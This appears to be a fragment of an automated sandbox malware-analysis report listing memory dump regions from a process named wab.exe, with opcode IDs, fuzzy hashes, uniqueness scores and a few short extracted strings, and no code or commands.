                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3055e458bd1db5849658913ff0cc21d4da1d0daa24b84406ecb32c0cf7be469f
                                                                          • Instruction ID: 65d67772811c5fb5254116abcac63aec3e3b52791438c7d2584481e1b75441b2
                                                                          • Opcode Fuzzy Hash: 3055e458bd1db5849658913ff0cc21d4da1d0daa24b84406ecb32c0cf7be469f
                                                                          • Instruction Fuzzy Hash: D10126313043591FCB22577E9C9061A77E6EBC3325F1588BEE509CB256DA24DE4283C5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5a4071ca1b0b6890591e453d0dceddbfa658666a9e606cf4fed285842076341f
                                                                          • Instruction ID: f6a0190ebca24617628e11d0d041665901a6e995aedc752bfaeca571d076b1db
                                                                          • Opcode Fuzzy Hash: 5a4071ca1b0b6890591e453d0dceddbfa658666a9e606cf4fed285842076341f
                                                                          • Instruction Fuzzy Hash: 6811D3B5D01259AFCB00DF9AD984ACEFFB4FB49320F10812AE918A7340C374A954CFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21eb83967d059b62bc88be60671ad1338f389a381b97edc9166ab9a0b00c7467
                                                                          • Instruction ID: 043a875cfeffa912bc473e2328d4e1419e944565b6f45f60114f9c220e6da2a6
                                                                          • Opcode Fuzzy Hash: 21eb83967d059b62bc88be60671ad1338f389a381b97edc9166ab9a0b00c7467
                                                                          • Instruction Fuzzy Hash: FF01B1327041155FD705AAB8C85074A7BEEDB8A712F0888A9F40ECB386D928DD0183C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c167a1149991682fa6e7c44df0e394a4ee6c9afa69038aefc5fe2c4965e7700
                                                                          • Instruction ID: 73d87dde5b366156e7dae36db44a25b1971982e730d7c4dd240a50b95ebe1501
                                                                          • Opcode Fuzzy Hash: 3c167a1149991682fa6e7c44df0e394a4ee6c9afa69038aefc5fe2c4965e7700
                                                                          • Instruction Fuzzy Hash: 94016D737000150BDB14AA7DD854B1BA3DACBCAB21F248879F50ECB395DD65DE0243A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a0675deab0ccc15f1ab35349e8a38d726bbce46b0b371a3fa73c907b0eee297
                                                                          • Instruction ID: f84541a9300368e5363a7085e32074e5acd6ee7f2048ebc30fc3636258747757
                                                                          • Opcode Fuzzy Hash: 4a0675deab0ccc15f1ab35349e8a38d726bbce46b0b371a3fa73c907b0eee297
                                                                          • Instruction Fuzzy Hash: E401AF337005154BDB19A63C8894B1F77DADBC9E21F1488B9F40ECB345DE29DE024381
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 79c3a91443b63f96d2357f987ebf03aaa398a3ed17c04b7cf76baa9c62145783
                                                                          • Instruction ID: 1e94a955c5fa90a21cfab13b528dd1d3d06f2c1de91e75a26d3181e122e769c8
                                                                          • Opcode Fuzzy Hash: 79c3a91443b63f96d2357f987ebf03aaa398a3ed17c04b7cf76baa9c62145783
                                                                          • Instruction Fuzzy Hash: 5301B571A102048BDF04EF55DD4478ABBA5EF94311F64C664E80C5B25AEB70DD45CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ab84fb5e755f2e6c585bbc0d2fa2b43e2926f46076245b7647b1ad7705cf1909
                                                                          • Instruction ID: b5ff8fb6912423c61cca3f7cf915df2e67f02839b0f3c1c3de32733e12579f5e
                                                                          • Opcode Fuzzy Hash: ab84fb5e755f2e6c585bbc0d2fa2b43e2926f46076245b7647b1ad7705cf1909
                                                                          • Instruction Fuzzy Hash: 00016D327000154BD704AA78C890B4BB3EEDB89722F148969F40ECB789D929DE0147C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4da8af0c438891d33c39b274ea227f984ca6e0ae3df471c8afc61e6b5c56e20d
                                                                          • Instruction ID: c906a476c110ee37eec1d574f28e21a4d5bbe1fb3ec5996c98ff91bd3e6dd52c
                                                                          • Opcode Fuzzy Hash: 4da8af0c438891d33c39b274ea227f984ca6e0ae3df471c8afc61e6b5c56e20d
                                                                          • Instruction Fuzzy Hash: 0501F271A041609ACB01EB795A413FDBFF59B48320F20C8A6D988D7242E6368A42D7C1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8f0ed76875b163e1ed91ef516f48976c6310d6878eddf95aac477aee5e7973a
                                                                          • Instruction ID: e5a3e912e313cc1088a38484660992cc0ba86be1797e1d0592166e03e0c533d7
                                                                          • Opcode Fuzzy Hash: b8f0ed76875b163e1ed91ef516f48976c6310d6878eddf95aac477aee5e7973a
                                                                          • Instruction Fuzzy Hash: 32F0BD3134C1028BF7311B798D093BD266CDF01741F68CCB6E80EC5181EE59CCC09A62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 17091e1c5300a40e74e0561e4643eeb96cb832110b6e5c9df579e60f6af3bb67
                                                                          • Instruction ID: f1bc9c1302dfdb2ce4925c8cf36992bf89f930c64d481e2f41adc97a9b1fd86a
                                                                          • Opcode Fuzzy Hash: 17091e1c5300a40e74e0561e4643eeb96cb832110b6e5c9df579e60f6af3bb67
                                                                          • Instruction Fuzzy Hash: F6F02E3130022A5BCB35677EE85072A32CADBD2322F018839E40ECB209EE61DE4283C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cb1a069e9fcdc992eb2888b2fbc319e55acb9f30ec432535eafe5e6ce460a3a3
                                                                          • Instruction ID: f1ecb942d6511a0ee0d68ddfe24eb84ed500a7eb124f840a0a4cc967c8d979c6
                                                                          • Opcode Fuzzy Hash: cb1a069e9fcdc992eb2888b2fbc319e55acb9f30ec432535eafe5e6ce460a3a3
                                                                          • Instruction Fuzzy Hash: 1A01D639B40104CFDB19DF64C55CB6D77B2EB88715F5484A4E906CB3A4CB39AD46CB44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d48d88c2ea4764b6ab6e6f7c787f526498fb947d64f7d69d7ae7c12b858eae9e
                                                                          • Instruction ID: f191473793180d6e108fb8ed82cc39ce109db168091d929d6bbe4298173a8baf
                                                                          • Opcode Fuzzy Hash: d48d88c2ea4764b6ab6e6f7c787f526498fb947d64f7d69d7ae7c12b858eae9e
                                                                          • Instruction Fuzzy Hash: 2C01D1B0A44229AFDF44EFB8F9916CD7BB1EB41312F0146A8D4099B261EA301F498B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9c34515cd98c8685f70ce7a2f73ed3f8da1ad0d29a66fd8dd5ea91ed5e4d95c
                                                                          • Instruction ID: 8f8ac942eb7b26059b87cf6d3ebbeb2661f19089adc0d773bec482b49ab5234c
                                                                          • Opcode Fuzzy Hash: d9c34515cd98c8685f70ce7a2f73ed3f8da1ad0d29a66fd8dd5ea91ed5e4d95c
                                                                          • Instruction Fuzzy Hash: 56F044709542299FCF44EFB4F9915DD77B1EB40312F1056A8D4199B264EE312E498B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 88aa0b79c8d47b9effab75e710cd6bf6274c32fc2f09288643b5174ad0937801
                                                                          • Instruction ID: cfe335c3ab8ddbfa3a675b6f45c5a2388c42f807d78ecd963739f2ea09713093
                                                                          • Opcode Fuzzy Hash: 88aa0b79c8d47b9effab75e710cd6bf6274c32fc2f09288643b5174ad0937801
                                                                          • Instruction Fuzzy Hash: ECE06D3260C2815AEB324A788C923FD2B758F17311F28C8F6C48EC6053E80ACC959622
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a67ea4ed2cf00ac1853f82f20775665d646132657aabfd7fa3d9508199728
                                                                          • Instruction ID: f44b85d468678e9e820ff061098273183e766903e5266d0f7fbfb5eb4ccd25af
                                                                          • Opcode Fuzzy Hash: c71a67ea4ed2cf00ac1853f82f20775665d646132657aabfd7fa3d9508199728
                                                                          • Instruction Fuzzy Hash: 3BE09273A2C14C5FDB00EA74DD457597BADDB02214F2A89E7D018CB143D237CB028B41
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3327d61526fd439267a0d9683537b0f28bf7199810861802a9aee990ba6db6f
                                                                          • Instruction ID: 8e0052b15ada488130186f716be2a0d33c973c06f0786eba6f0d79158590dc34
                                                                          • Opcode Fuzzy Hash: e3327d61526fd439267a0d9683537b0f28bf7199810861802a9aee990ba6db6f
                                                                          • Instruction Fuzzy Hash: 65E0C23120C6501FD319876A8849A667BF9AF46315B08C4EBF06A8B152C619AA088791
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a9ecbe11b10ec70f89c28285e797ff585f828d7988653d46d0b07edb241205cb
                                                                          • Instruction ID: 3f7930f24ac0c63b1c1ab2c6c30a239a9c72fc281c64d60e1d8f86106b633480
                                                                          • Opcode Fuzzy Hash: a9ecbe11b10ec70f89c28285e797ff585f828d7988653d46d0b07edb241205cb
                                                                          • Instruction Fuzzy Hash: 93D05E31619B108BC328DA19D548657B7EABB89725B44C829F45A87A40C764FD018B80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e260a1c7e37dfec96a602c3b38ca54ca11ba80754706c8194d31d2978c21f89
                                                                          • Instruction ID: d7d5fdd84a3d18814340f970ea6afe78b1bd6bbb1d68cc61cecb130ec8661c19
                                                                          • Opcode Fuzzy Hash: 5e260a1c7e37dfec96a602c3b38ca54ca11ba80754706c8194d31d2978c21f89
                                                                          • Instruction Fuzzy Hash: 93D01233F403189FDF10AEA0EC825ACB362FBC4261F1185F5D6189B195DA355F2187C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_a70000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 643b8a1a1234eb4db5c59519138f947e62357a95f143b50ccfb0c09ac5315c40
                                                                          • Instruction ID: abba934c9cdd1d00496e9075a2373d5afc7e37dba920f39d076b54bc3108f423
                                                                          • Opcode Fuzzy Hash: 643b8a1a1234eb4db5c59519138f947e62357a95f143b50ccfb0c09ac5315c40
                                                                          • Instruction Fuzzy Hash: 84C0123A3080508F8606A728E0644B837B5DBCA26932840AAE148CB322CE229C028B40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: <:z"$$qq$$qq$$qq$$qq$$qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-4254762888
                                                                          • Opcode ID: 524aa2617cbd623b177b304b5dfd5dd1bff9e9a1b521f59c45f1ac06b1375e08
                                                                          • Instruction ID: 6b838611ec9d937dcb3a07dc363a8c6d17a4b4868629bedb1c03f8a2bb9eaa6f
                                                                          • Opcode Fuzzy Hash: 524aa2617cbd623b177b304b5dfd5dd1bff9e9a1b521f59c45f1ac06b1375e08
                                                                          • Instruction Fuzzy Hash: 65125C72A00219CFDB14DF65C994A9EB7F6BF88301F2485A9D40AAB355DB349E81CF80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq$$qq$$qq$$qq$$qq$I[
                                                                          • API String ID: 0-3591596285
                                                                          • Opcode ID: c8a1d273d20986c0a589e7bc3a72f8aaa9507e27785c8d09bb0f8a2ee01f841c
                                                                          • Instruction ID: a2f08008c065fe6d5e945115e475b80a89a9525c8ee3a07b9dd241aaf69f82c5
                                                                          • Opcode Fuzzy Hash: c8a1d273d20986c0a589e7bc3a72f8aaa9507e27785c8d09bb0f8a2ee01f841c
                                                                          • Instruction Fuzzy Hash: B6918232A1020DDFDB14DB68CA54BAEB7F6FF84301F248569E416D7255DB789E41CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq$$qq$$qq
                                                                          • API String ID: 0-1822695862
                                                                          • Opcode ID: 831abe269813aa3e56bd7a1c70ba9d7be4cc9e9a3786d4a4c40b70c249122a58
                                                                          • Instruction ID: 61a4be279249dad75261331cd1b0d39a000a6844a81657955cca304f3b65b8f1
                                                                          • Opcode Fuzzy Hash: 831abe269813aa3e56bd7a1c70ba9d7be4cc9e9a3786d4a4c40b70c249122a58
                                                                          • Instruction Fuzzy Hash: 65F13A71A41209CFDB04EFA4C994A5EB7B3FF84301F2585A9E4199B355DF39AD42CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq
                                                                          • API String ID: 0-3704488771
                                                                          • Opcode ID: 74111ac2d50cf23d488aa514f432f430eb300fca9b89841e53145f6bf3aba9c4
                                                                          • Instruction ID: 5f06a69b94d69741857219b3a2c5ba54fe127f1ca5d5eec9895a137c709c2f5d
                                                                          • Opcode Fuzzy Hash: 74111ac2d50cf23d488aa514f432f430eb300fca9b89841e53145f6bf3aba9c4
                                                                          • Instruction Fuzzy Hash: 13B13D72A00219DFDB14EBA4C990A9EB7B6FF84701F24C569E4099F355DB35ED82CB80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $qq$$qq$$qq$$qq
                                                                          • API String ID: 0-3704488771
                                                                          • Opcode ID: c90d269b305651b1bc211e1a867d8090db4c70885109da5455acf551964c432d
                                                                          • Instruction ID: a34c3793ac9ead3de91a52a8c8dc0c14247cc16a719d53c3459c75cd7ba1f3a0
                                                                          • Opcode Fuzzy Hash: c90d269b305651b1bc211e1a867d8090db4c70885109da5455acf551964c432d
                                                                          • Instruction Fuzzy Hash: 7C518F73A00209CFCF15EB68DA9069EB3F6EB84312F1485A9E415DB356DB34EE41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_233d0000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LRqq$LRqq$$qq$$qq
                                                                          • API String ID: 0-2668842011
                                                                          • Opcode ID: d6551959022eed41610bc18ab7b332ae62f0aa3d947ebe998e73032ccc47659d
                                                                          • Instruction ID: 1af987f337b040033a4e37fb655c20441f546e234e6595660ba73ee1e2f06654
                                                                          • Opcode Fuzzy Hash: d6551959022eed41610bc18ab7b332ae62f0aa3d947ebe998e73032ccc47659d
                                                                          • Instruction Fuzzy Hash: 3051B1727002199FCB08EB28C980A5AB7F6FF88701F1585A9E4169F396DB34ED41CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%